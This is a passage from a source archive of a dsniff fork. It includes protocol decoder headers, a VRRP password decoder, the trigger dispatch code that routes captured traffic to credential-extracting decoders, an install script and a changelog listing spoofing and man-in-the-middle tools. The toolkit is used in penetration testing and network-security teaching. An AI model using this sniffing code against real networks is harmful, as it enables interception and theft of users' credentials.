you have the warnx function. */ #undef HAVE_WARNX /* Define if you have the header file. */ #undef HAVE_ERR_H /* Define if you have the header file. */ #undef HAVE_FCNTL_H /* Define if you have the header file. */ #undef HAVE_LIBGEN_H /* Define if you have the header file. */ #undef HAVE_NET_IF_TUN_H /* Define if you have the header file. */ #undef HAVE_SYS_IOCTL_H /* Define if you have the header file. */ #undef HAVE_SYS_QUEUE_H /* Define if you have the header file. */ #undef HAVE_UNISTD_H /* Define if you have the nsl library (-lnsl). */ #undef HAVE_LIBNSL /* Define if you have the resolv library (-lresolv). */ #undef HAVE_LIBRESOLV /* Define if you have the rpcsvc library (-lrpcsvc). */ #undef HAVE_LIBRPCSVC /* Define if you have the socket library (-lsocket). */ #undef HAVE_LIBSOCKET hackerschoice-dsniff-a17510d/decode.h0000664000175000017500000001072615105626144017414 0ustar epsilonepsilon/* * decode.h * * Protocol decoding routines. * * Copyright (c) 2000 Dug Song * * $Id: decode.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef DECODE_H #define DECODE_H #include #include #include #include typedef int (*decode_func)(u_char *, int, u_char *, int); struct decode { char *dc_name; decode_func dc_func; }; // Meta data for decoded items struct _dc_meta { u_char *rbuf; // reverse connection int rlen; uint32_t crc; int is_hot; // found a password or vulnerability }; // ANSI color codes. #define CDR "\033[0;31m" #define CDG "\033[0;32m" #define CDY "\033[0;33m" #define CDB "\033[0;34m" #define CDM "\033[0;35m" #define CDC "\033[0;36m" #define CDW "\033[0;37m" #define CR "\033[1;31m" #define CG "\033[1;32m" #define CY "\033[1;33m" #define CN "\033[0m" #define CB "\033[1;34m" #define CM "\033[1;35m" #define CC "\033[1;36m" #define CW "\033[1;37m" #define CF "\033[2m" // faint #define CUL "\033[4m" // underlined struct decode *getdecodebyname(const char *name); #define pletohs(p) ((u_short) \ ((u_short)*((u_char *)p+1)<<8| \ (u_short)*((u_char *)p+0)<<0)) #define pletohl(p) ((u_int32_t)*((u_char *)p+3)<<24| \ (u_int32_t)*((u_char *)p+2)<<16| \ (u_int32_t)*((u_char *)p+1)<<8| \ (u_int32_t)*((u_char *)p+0)<<0) #define pntohs(p) ((u_short) \ ((u_short)*((u_char *)p+1)<<0| \ (u_short)*((u_char *)p+0)<<8)) #define pntohl(p) ((u_int32_t)*((u_char *)p+3)<<0| \ (u_int32_t)*((u_char *)p+2)<<8| \ (u_int32_t)*((u_char *)p+1)<<16| \ (u_int32_t)*((u_char *)p+0)<<24) int strip_telopts(u_char *buf, int len); int strip_lines(char *buf, int max_lines); void dc_update(struct _dc_meta *m, const void *buf, size_t len); int is_ascii_string(char *buf, int len); u_char * ascii_string(u_char *buf, int sz); u_char *color_domain(u_char *dst, size_t dsz, u_char *src); u_char *color_ip(u_char *dst, size_t dsz, in_addr_t ip); u_char *bufbuf(u_char *big, int blen, u_char *little, int llen); int decode_aim(u_char *buf, int len, u_char *obuf, int olen); int decode_citrix(u_char *buf, int len, u_char *obuf, int olen); int decode_cvs(u_char *buf, int len, u_char *obuf, int olen); int decode_ftp(u_char *buf, int len, u_char *obuf, int olen); int decode_hex(u_char *buf, int len, u_char *obuf, int olen); int decode_http(u_char *buf, int len, u_char *obuf, int olen); int decode_icq(u_char *buf, int len, u_char *obuf, int olen); int decode_imap(u_char *buf, int len, u_char *obuf, int olen); int decode_irc(u_char *buf, int len, u_char *obuf, int olen); int decode_ldap(u_char *buf, int len, u_char *obuf, int olen); int decode_mmxp(u_char *buf, int len, u_char *obuf, int olen); int decode_mountd(u_char *buf, int len, u_char *obuf, int olen); int decode_napster(u_char *buf, int len, u_char *obuf, int olen); int decode_nntp(u_char *buf, int len, u_char *obuf, int olen); int decode_oracle(u_char *buf, int len, u_char *obuf, int olen); int decode_ospf(u_char *buf, int len, u_char *obuf, int olen); int decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen); int decode_pop(u_char *buf, int len, u_char *obuf, int olen); int decode_poppass(u_char *buf, int len, u_char *obuf, int olen); int decode_portmap(u_char *buf, int len, u_char *obuf, int olen); int decode_postgresql(u_char *buf, int len, u_char *obuf, int olen); int decode_pptp(u_char *buf, int len, u_char *obuf, int olen); int decode_rip(u_char *buf, int len, u_char *obuf, int olen); int decode_rlogin(u_char *buf, int len, u_char *obuf, int olen); int decode_smb(u_char *buf, int len, u_char *obuf, int olen); int decode_smtp(u_char *buf, int len, u_char *obuf, int olen); int decode_sniffer(u_char *buf, int len, u_char *obuf, int olen); int decode_snmp(u_char *buf, int len, u_char *obuf, int olen); int decode_socks(u_char *buf, int len, u_char *obuf, int olen); int decode_tds(u_char *buf, int len, u_char *obuf, int olen); int decode_telnet(u_char *buf, int len, u_char *obuf, int olen); int decode_vrrp(u_char *buf, int len, u_char *obuf, int olen); int decode_x11(u_char *buf, int len, u_char *obuf, int olen); int decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen); int decode_ypserv(u_char *buf, int len, u_char *obuf, int olen); int decode_authplain(u_char *p, char **userp, char **passwordp); #endif /* DECODE_H */ hackerschoice-dsniff-a17510d/decode_vrrp.c0000664000175000017500000000304515105626144020454 0ustar epsilonepsilon/* * decode_vrrp.c * * Virtual Router Redundancy Protocol. * * Copyright (c) 2000 Eric Jackson * Copyright (c) 2000 Dug Song * * $Id: decode_vrrp.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "buf.h" #include "decode.h" struct vrrp_header { u_char vr_vers; /* Version */ u_char vr_vrid; /* Virtual Router ID */ u_char vr_prio; /* Router Priority */ u_char vr_naddr; /* # of addresses */ u_char vr_auth; /* Type of Authentication */ u_char vr_advr; /* ADVERTISEMENT Interval */ u_short vr_cksum; /* Checksum */ /* vr_naddr * 4 # of addresses */ }; #define VRRP_AUTH_NONE 0 #define VRRP_AUTH_SIMPLE 1 #define VRRP_AUTH_AH 2 #define VRRP_AUTH_DATA_LEN 8 int decode_vrrp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *b, inbuf, outbuf; struct vrrp_header *vrrp; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); vrrp = (struct vrrp_header *)buf_ptr(&inbuf); if (buf_len(&inbuf) < sizeof(*vrrp)) return (0); /* We only care about VRRP_AUTH_SIMPLE */ if (ntohs(vrrp->vr_auth) != VRRP_AUTH_SIMPLE) return (0); /* XXX - probably want to verify checksum */ /* Forward to Authentication Data */ buf_skip(&inbuf, sizeof(*vrrp) + 8 + (vrrp->vr_naddr * 4)); if ((b = buf_tok(&inbuf, NULL, VRRP_AUTH_DATA_LEN)) == NULL) return (0); buf_put(&outbuf, buf_ptr(b), buf_len(b)); buf_put(&outbuf, "\n", 1); buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/trigger.c0000664000175000017500000003611415105626144017626 0ustar epsilonepsilon/* * trigger.c * * Copyright (c) 2000 Dug Song * * $Id: trigger.c,v 1.21 2001/03/15 08:33:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "decode.h" #include "magic.h" #include "options.h" #include "pathnames.h" #include "record.h" #include "tcp_raw.h" #include "trigger.h" #include "crc32.h" #include "dsniff_services.h" struct trigger { int num; struct decode *decode; }; static struct trigger ip_triggers[32]; static struct trigger udp_triggers[512]; static struct trigger tcp_triggers[512]; static struct trigger rpc_triggers[32]; static u_int ip_cnt = 0; static u_int udp_cnt = 0; static u_int tcp_cnt = 0; static u_int rpc_cnt = 0; static char obuf[4096]; extern struct _dc_meta dc_meta; static int trigger_compare(const void *a, const void *b) { struct trigger *p, *q; q = (struct trigger *)a; p = (struct trigger *)b; if (p->num < q->num) { return (-1); } else if (p->num > q->num) { return (1); } return (0); } int trigger_set_ip(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_ip: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_ip: proto %d already set", num); return (0); } if (ip_cnt == sizeof(ip_triggers) / sizeof(tr)) { warnx("trigger_set_ip: ip_triggers full"); return (0); } ip_triggers[ip_cnt++] = tr; qsort(&ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_ip: proto %d -> %s", num, name); return (1); } int trigger_set_udp(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_udp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_udp: port %d already set", num); return (0); } if (udp_cnt == sizeof(udp_triggers) / sizeof(tr)) { warnx("trigger_set_udp: udp_triggers full"); return (0); } udp_triggers[udp_cnt++] = tr; qsort(&udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_udp: port %d -> %s", num, name); return (1); } int trigger_set_tcp(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_tcp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_tcp: port %d already set", num); return (0); } if (tcp_cnt == sizeof(tcp_triggers) / sizeof(tr)) { warnx("trigger_set_tcp: tcp_triggers full"); return (0); } tcp_triggers[tcp_cnt++] = tr; qsort(&tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_tcp: port %d -> %s", num, name); return (1); } int trigger_set_rpc(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_tcp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_rpc: RPC program %d already set", num); return (0); } if (rpc_cnt == sizeof(rpc_triggers) / sizeof(tr)) { warnx("trigger_set_rpc: rpc_triggers full"); return (0); } rpc_triggers[rpc_cnt++] = tr; qsort(&rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_rpc: program %d -> %s", num, name); return (1); } static int trigger_set(char *proto, int num, char *name) { if (strcasecmp(proto, "ip") == 0) { return (trigger_set_ip(num, name)); } else if (strcasecmp(proto, "udp") == 0) { return (trigger_set_udp(num, name)); } else if (strcasecmp(proto, "tcp") == 0) { return (trigger_set_tcp(num, name)); } else if (strcasecmp(proto, "rpc") == 0) { return (trigger_set_rpc(num, name)); } else warnx("trigger_set: unknown protocol %s", proto); return (0); } static struct trigger * trigger_set_magic(int proto, int num, u_char *buf, int len) { struct trigger *t, tr; char *name; if ((name = magic_match(buf, len)) == NULL) return NULL; t = NULL; tr.num = num; if (proto == IPPROTO_UDP) { trigger_set_udp(num, name); if (strcmp(name, "portmap") == 0 || /* XXX - hack */ strcmp(name, "mountd") == 0 || strcmp(name, "yppasswd") == 0) { trigger_set_udp(0 - num, name); } t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); } else if (proto == IPPROTO_TCP) { trigger_set_tcp(num, name); if (strcmp(name, "portmap") == 0 || /* XXX - hack */ strcmp(name, "mountd") == 0 || strcmp(name, "yppasswd") == 0) { trigger_set_tcp(0 - num, name); } t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); } return (t); } void trigger_dump(void) { FILE *f; int i; if ((f = fopen(DSNIFF_SERVICES, "w")) == NULL) { warn("trigger_dump: couldn't open " DSNIFF_SERVICES); return; } fprintf(f, "# $Id: trigger.c,v 1.21 2001/03/15 08:33:05 dugsong Exp $\n" "#\n# Network services, dsniff style\n#\n"); for (i = 0; i < ip_cnt; i++) { fprintf(f, "%s\t\t%d/ip\n", ip_triggers[i].decode->dc_name, ip_triggers[i].num); } for (i = 0; i < udp_cnt; i++) { fprintf(f, "%s\t\t%d/udp\n", udp_triggers[i].decode->dc_name, udp_triggers[i].num); } for (i = 0; i < tcp_cnt; i++) { fprintf(f, "%s\t\t%d/tcp\n", tcp_triggers[i].decode->dc_name, tcp_triggers[i].num); } for (i = 0; i < rpc_cnt; i++) { fprintf(f, "%s\t\t%d/rpc\n", rpc_triggers[i].decode->dc_name, rpc_triggers[i].num); } fclose(f); } static int dc_call(struct decode *dc, u_char *buf, int len, u_char *obuf, int olen) { dc_meta.is_hot = 0; dc_meta.crc = crc32_update(NULL, 0, CRC32_INITIAL); return dc->dc_func(buf, len, obuf, olen); } void trigger_ip(struct libnet_ipv4_hdr *ip) { struct trigger *t, tr; u_char *buf; int len; tr.num = ip->ip_p; t = (struct trigger *) bsearch(&tr, &ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (t == NULL) return; buf = (u_char *)ip + (ip->ip_hl * 4); len = ntohs(ip->ip_len) - (ip->ip_hl * 4); if (Opt_debug) warnx("trigger_ip: decoding proto %d as %s", tr.num, t->decode->dc_name); if ((len = dc_call(t->decode, buf, len, obuf, sizeof(obuf))) > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, ip->ip_p, 0, 0, t->decode->dc_name, obuf, len); } } /* libnids needs a nids_register_udp()... */ void trigger_udp(struct libnet_ipv4_hdr *ip) { struct trigger *t, tr; struct libnet_udp_hdr *udp; u_char *buf; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_UDP || len < sizeof(*udp)) return; buf = (u_char *)ip + ip_hl; udp = (struct libnet_udp_hdr *)buf; if (len != ntohs(udp->uh_ulen)) return; buf += sizeof(*udp); len -= sizeof(*udp); tr.num = ntohs(udp->uh_dport); t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t == NULL) { tr.num = 0 - (int) ntohs(udp->uh_sport); t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_UDP, ntohs(udp->uh_dport), buf, len); if (t == NULL) return; } if (Opt_debug) warnx("trigger_udp: decoding port %d as %s", tr.num, t->decode->dc_name); if ((len = dc_call(t->decode, buf, len, obuf, sizeof(obuf))) > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, IPPROTO_UDP, ntohs(udp->uh_sport), ntohs(udp->uh_dport), t->decode->dc_name, obuf, len); } } static void trigger_tcp_half(struct tuple4 *addr, struct half_stream *hs, struct trigger *t) { u_char *buf; int len; buf = hs->data; len = hs->count - hs->offset; if (len == 0 || buf == NULL) return; if (hs->bufsize > len) buf[len] = '\0'; if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, addr->dest, buf, len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp: decoding port %d as %s", addr->dest, t->decode->dc_name); if ((len = dc_call(t->decode, buf, len, obuf, sizeof(obuf))) > 0) { record(addr->saddr, addr->daddr, IPPROTO_TCP, addr->source, addr->dest, t->decode->dc_name, obuf, len); } } hs->collect = 0; } static void trigger_tcp_full(struct tuple4 *addr, struct half_stream *hs, struct half_stream *buddy /* S>C */, struct trigger *t) { dc_meta.rbuf = NULL; dc_meta.rlen = buddy->count - buddy->offset; if (dc_meta.rlen > 0) dc_meta.rbuf = buddy->data; trigger_tcp_half(addr, hs, t); dc_meta.rbuf = NULL; buddy->collect = hs->collect; } void trigger_tcp(struct tcp_stream *ts, void **conn_save) { struct trigger *ct, *st, tr; int is_keep_data = 1; tr.num = ts->addr.dest; ct = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); tr.num = 0 - (int) ts->addr.dest; st = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); switch (ts->nids_state) { case NIDS_JUST_EST: // Always collect from both sides because HTTP-response // may contain "Location" redirect to https, which is HOTHOTHOT. ts->server.collect = 1; ts->client.collect = 1; // if (Opt_verbose) { // // Collect SSH banner from both sides. // ts->server.collect = 1; // ts->client.collect = 1; // } // if (ct != NULL || Opt_magic) { // ts->server.collect = 1; // } // if (st != NULL) { // ts->client.collect = 1; // } break; case NIDS_DATA: if (Opt_debug) { if (ts->client.count_new > 0) fprintf(stderr, "BY SERVER: "); else fprintf(stderr, "by client: "); fprintf(stderr, "%d/%d ct=%p (C>S=%d) st=%p (ByServer=%d)\n", ts->server.collect, ts->client.collect, ct, ts->server.count_new, st, ts->client.count_new); } if ((ct != NULL || Opt_magic) && ts->server.count_new) { if (ts->server.count - ts->server.offset >= Opt_snaplen) { trigger_tcp_full(&ts->addr, &ts->server, &ts->client, ct); is_keep_data = 0; } } else if (st != NULL && ts->client.count_new) { if (ts->client.count - ts->client.offset >= Opt_snaplen) { trigger_tcp_full(&ts->addr, &ts->client, &ts->server, st); is_keep_data = 0; } } if (is_keep_data) { nids_discard(ts, 0 /* Discard 0 bytes */); if ((ts->server.count_new > 0) && (ts->server.count - ts->server.offset) >= Opt_snaplen) { // fprintf(stderr, "STOPPING C>S collection\n"); ts->server.collect = 0; } if ((ts->client.count_new > 0) && (ts->client.count - ts->client.offset) >= Opt_snaplen) { // fprintf(stderr, "STOPPING ByServer collection\n"); ts->client.collect = 0; } } break; default: if (Opt_debug) warnx("CLOSE"); if ((ct != NULL || Opt_magic) && ts->server.count > 0) { trigger_tcp_full(&ts->addr, &ts->server, &ts->client, ct); } else if (st != NULL && ts->client.count > 0) { trigger_tcp_full(&ts->addr, &ts->client, &ts->server, st); } break; } } void trigger_tcp_raw(struct libnet_ipv4_hdr *ip) { struct trigger *t, tr; struct libnet_tcp_hdr *tcp; struct iovec *iov; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_TCP || len < sizeof(*tcp)) return; tcp = (struct libnet_tcp_hdr *)((u_char *)ip + ip_hl); tr.num = ntohs(tcp->th_dport); // fprintf(stderr, "Packet len=%d port=%d\n", len, tr.num); t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL) { tr.num = 0 - (int) ntohs(tcp->th_sport); t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL && !Opt_magic) return; } if ((iov = tcp_raw_input(ip, tcp, len)) == NULL) return; if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, ntohs(tcp->th_dport), iov->iov_base, iov->iov_len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp_raw: decoding port %d as %s", tr.num, t->decode->dc_name); len = dc_call(t->decode, iov->iov_base, iov->iov_len, obuf, sizeof(obuf)); if (len > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, IPPROTO_TCP, ntohs(tcp->th_sport), ntohs(tcp->th_dport), t->decode->dc_name, obuf, len); } } free(iov->iov_base); free(iov); } static void trigger_tcp_raw_callback(in_addr_t src, in_addr_t dst, u_short sport, u_short dport, u_char *buf, int len) { struct trigger *t, tr; tr.num = dport; t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, dport, buf, len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp_raw_timeout: " "decoding port %d as %s", tr.num, t->decode->dc_name); if ((len = dc_call(t->decode, buf, len, obuf, sizeof(obuf))) > 0) { record(src, dst, IPPROTO_TCP, sport, dport, t->decode->dc_name, obuf, len); } } } void trigger_tcp_raw_timeout(int signal) { tcp_raw_timeout(TRIGGER_TCP_RAW_TIMEOUT, trigger_tcp_raw_callback); alarm(TRIGGER_TCP_RAW_TIMEOUT); } void trigger_rpc(int program, int proto, int port) { struct trigger *t, tr; tr.num = program; t = (struct trigger *) bsearch(&tr, &rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (t == NULL) return; if (proto == IPPROTO_UDP) { trigger_set_udp(port, t->decode->dc_name); } else if (proto == IPPROTO_TCP) { trigger_set_tcp(port, t->decode->dc_name); } } void trigger_init_magic(char *filename) { magic_init(filename); } void trigger_init_list(char *list) { char *name, *port, *proto = NULL; while ((name = strsep(&list, ",")) != NULL) { if ((port = strsep(&name, "/")) == NULL || (proto = strsep(&name, "=")) == NULL) { errx(1, "trigger_init_list: parse error"); } trigger_set(proto, atoi(port), name); } } static int trigger_init_services_file(char *services) { FILE *f; char *name, *port, *proto, line[1024]; char *fn; fn = services; if (fn == NULL) fn = DSNIFF_LIBDIR DSNIFF_SERVICES; if ((f = fopen(fn, "r")) == NULL) { if (services == NULL) return 1; // Continue; errx(1, "couldn't open %s", services); } while (fgets(line, sizeof(line), f) != NULL) { if (line[0] == '#' || line[0] == '\n') continue; if ((name = strtok(line, " \t")) == NULL || (port = strtok(NULL, " \t/")) == NULL || (proto = strtok(NULL, " \t#\n")) == NULL) { continue; } trigger_set(proto, atoi(port), name); } fclose(f); return 0; } void trigger_init_services(char *services) { if (trigger_init_services_file(services) == 0) return; for (int i = 0; i < sizeof dsx / sizeof *dsx; i++) { trigger_set(dsx[i].proto, dsx[i].port, dsx[i].name); } } hackerschoice-dsniff-a17510d/install-sh0000775000175000017500000001124415105626144020020 0ustar epsilonepsilon#! /bin/sh # # install - install a program, script, or datafile # This comes from X11R5. # # Calling this script install-sh is preferred over install.sh, to prevent # `make' implicit rules from creating a file called install from it # when there is no Makefile. # # This script is compatible with the BSD install script, but was written # from scratch. # # set DOITPROG to echo to test this script # Don't use :- since 4.3BSD and earlier shells don't like it. doit="${DOITPROG-}" # put in absolute paths if you don't have them in your path; or use env. vars. mvprog="${MVPROG-mv}" cpprog="${CPPROG-cp}" chmodprog="${CHMODPROG-chmod}" chownprog="${CHOWNPROG-chown}" chgrpprog="${CHGRPPROG-chgrp}" stripprog="${STRIPPROG-strip}" rmprog="${RMPROG-rm}" mkdirprog="${MKDIRPROG-mkdir}" tranformbasename="" transform_arg="" instcmd="$mvprog" chmodcmd="$chmodprog 0755" chowncmd="" chgrpcmd="" stripcmd="" rmcmd="$rmprog -f" mvcmd="$mvprog" src="" dst="" dir_arg="" while [ x"$1" != x ]; do case $1 in -c) instcmd="$cpprog" shift continue;; -d) dir_arg=true shift continue;; -m) chmodcmd="$chmodprog $2" shift shift continue;; -o) chowncmd="$chownprog $2" shift shift continue;; -g) chgrpcmd="$chgrpprog $2" shift shift continue;; -s) stripcmd="$stripprog" shift continue;; -t=*) transformarg=`echo $1 | sed 's/-t=//'` shift continue;; -b=*) transformbasename=`echo $1 | sed 's/-b=//'` shift continue;; *) if [ x"$src" = x ] then src=$1 else # this colon is to work around a 386BSD /bin/sh bug : dst=$1 fi shift continue;; esac done if [ x"$src" = x ] then echo "install: no input file specified" exit 1 else true fi if [ x"$dir_arg" != x ]; then dst=$src src="" if [ -d $dst ]; then instcmd=: else instcmd=mkdir fi else # Waiting for this to be detected by the "$instcmd $src $dsttmp" command # might cause directories to be created, which would be especially bad # if $src (and thus $dsttmp) contains '*'. if [ -f $src -o -d $src ] then true else echo "install: $src does not exist" exit 1 fi if [ x"$dst" = x ] then echo "install: no destination specified" exit 1 else true fi # If destination is a directory, append the input filename; if your system # does not like double slashes in filenames, you may need to add some logic if [ -d $dst ] then dst="$dst"/`basename $src` else true fi fi ## this sed command emulates the dirname command dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'` # Make sure that the destination directory exists. # this part is taken from Noah Friedman's mkinstalldirs script # Skip lots of stat calls in the usual case. if [ ! -d "$dstdir" ]; then defaultIFS=' ' IFS="${IFS-${defaultIFS}}" oIFS="${IFS}" # Some sh's can't handle IFS=/ for some reason. IFS='%' set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'` IFS="${oIFS}" pathcomp='' while [ $# -ne 0 ] ; do pathcomp="${pathcomp}${1}" shift if [ ! -d "${pathcomp}" ] ; then $mkdirprog "${pathcomp}" else true fi pathcomp="${pathcomp}/" done fi if [ x"$dir_arg" != x ] then $doit $instcmd $dst && if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi && if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi && if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi && if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi else # If we're going to rename the final executable, determine the name now. if [ x"$transformarg" = x ] then dstfile=`basename $dst` else dstfile=`basename $dst $transformbasename | sed $transformarg`$transformbasename fi # don't allow the sed command to completely eliminate the filename if [ x"$dstfile" = x ] then dstfile=`basename $dst` else true fi # Make a temp file name in the proper directory. dsttmp=$dstdir/#inst.$$# # Move or copy the file name to the temp name $doit $instcmd $src $dsttmp && trap "rm -f ${dsttmp}" 0 && # and set any options; do chmod last to preserve setuid bits # If any of these fail, we abort the whole thing. If we want to # ignore errors from any of these, just make sure not to ignore # errors from the above "$doit $instcmd $src $dsttmp" command. if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi && if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi && if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi && if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi && # Now rename the file to the real destination. $doit $rmcmd -f $dstdir/$dstfile && $doit $mvcmd $dsttmp $dstdir/$dstfile fi && exit 0 hackerschoice-dsniff-a17510d/CHANGES0000664000175000017500000001450115105626144017006 0ustar epsilonepsilon$Id: CHANGES,v 1.56 2001/03/19 06:53:47 dugsong Exp $ - Add support for ICMP frag-needed to tcpnice. - New sshow program: http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt - Add support for HTTP absolute URIs to webmitm and urlsnarf. - Add support for non-transparent proxying to webmitm, as requested by Juergen Schmidt . - Fix TDS decode for MSSQL 7.x, from Paul van Maaren . - Kludge around stupid Redhat Linux 6, 7 build env inconsistencies. - Fix dumb endianness bug in dnsspoof. v2.3 Sun Dec 17 11:35:38 EST 2000 - Add VRRP parsing to dsniff, from Eric Jackson . - Require pcap filter argument for tcpkill, tcpnice. - Add Microsoft PPTP MS-CHAP (v1, v2) parsing to dsniff, based on anger.c by Aleph One . - Fix pcAnywhere 7, 9.x parsing in dsniff. - Add -t trigger[,...] flag to dsniff, to specify individual triggers on the command line. - Convert most everything to use new buf interface. - New programs: dnsspoof, msgsnarf, sshmitm, webmitm. - Fix inverted regex matching in *snarf programs. - Consistent arpspoof, macof, tcpnice, tcpkill output. - Rename arpredirect to arpspoof (maintain consistent *sniff, *snarf, *spoof, *spy nomenclature). - Consistent pcap filter argument to dsniff, *snarf programs. - Add trigger for Checkpoint Firewall-1 Session Authentication Agent (261/tcp), as suggested by Joe Segreti . - Add SMTP parsing to dsniff, as requested by Denis Ducamp . - Add rexec and RPC ypserv parsing to dsniff, as requested by Oliver Friedrichs . - Add HTTP proxy auth parsing back to dsniff, it got lost in the shuffle. Reported by Denis Ducamp . - Add NNTPv2 and other AUTHINFO extensions to dsniff. v2.2 Wed Jun 14 00:58:37 EDT 2000 - Rewrite HTTP decoding in dsniff, adding support for QUERY_STRING and x-www-form-urlencoded parsing (various CGI authentication schemes). - Alpha support (libnids and libnet still need to be fixed). - Fix arp discovery in arpredirect on Linux. - Add -m flag to enable automatic protocol detection in dsniff, based on the classic file(1) command by Ian Darwin. - Add TDS (Sybase, Microsoft SQL Server) parsing to dsniff. - Clean up RPC decodes, TCP half-duplex reassembly in dsniff. - New filesnarf program. - Add regular expression matching to mailsnarf. - Add POP support to mailsnarf. v2.1 Thu May 18 16:18:35 EDT 2000 - Add -c flag to specify half-duplex TCP stream reassembly in dsniff (better support for sniffing off switched ports using arpredirect). - Fix > 24 char Meeting Maker passwd parsing in dsniff. - Fix OSPF parsing in dsniff (don't truncate first two chars), as reported by Felix Contreras . - Fix webspy URL ignoring, as reported by Interrupt . v2.0 Tue May 16 13:11:22 EDT 2000 - Major dsniff rewrite, since ppl are actually reading this code. :-) - Add configurable decode triggers to dsniff. - Add dsniff debugging functions, split out decode routines. - Add yppasswd parsing to dsniff. - Rewrite dsniff RPC framework, portmap and NFS mountd decodes. - Make dsniff savefile format portable. - Remove findgw - to be subsumed by dsquat package. - Add PostgreSQL parsing to dsniff. - Add Meeting Maker parsing to dsniff. - Add poppass parsing to dsniff. - Add RIP, OSPF parsing to dsniff. - Fix RSET handling in mailsnarf (from Martin Fredriksson ). v1.8 Sun Apr 9 23:59:46 EDT 2000 - Add SOCKS parsing to dsniff. - Add pcAnywhere parsing to dsniff. - Fix SMB parsing in dsniff. - Add IRC parsing to dsniff. - Add NAI Sniffer parsing to dsniff (from Anonymous). v1.7 Mon Mar 27 16:19:32 EST 2000 - Add -s flag to specify snaplen to dsniff. - Support systems without or dirname(). - Add Microsoft SMB parsing to dsniff. - Add Citrix ICA parsing to dsniff. - Add LDAP parsing to dsniff. - Fix Berkeley mbox format again (\n, not \r\n). - Fix null URI dereference in urlsnarf. - Add Oracle SQL*Net (v2, Net8) parsing to dsniff. - Catch data left on connection close in mailsnarf, urlsnarf, webspy. v1.6 Sun Mar 12 16:25:09 EST 2000 - Support non-glibc Linux systems missing ether_ntoa(). - Unique HTTP auth info by URI dirname in dsniff. - Add Napster parsing to dsniff. - Don't rely on /etc/services for dsniff. - Add AIM, ICQ (v2, v5) parsing to dsniff. - Add CVS pserver parsing to dsniff. - Skip IMAP command tag in 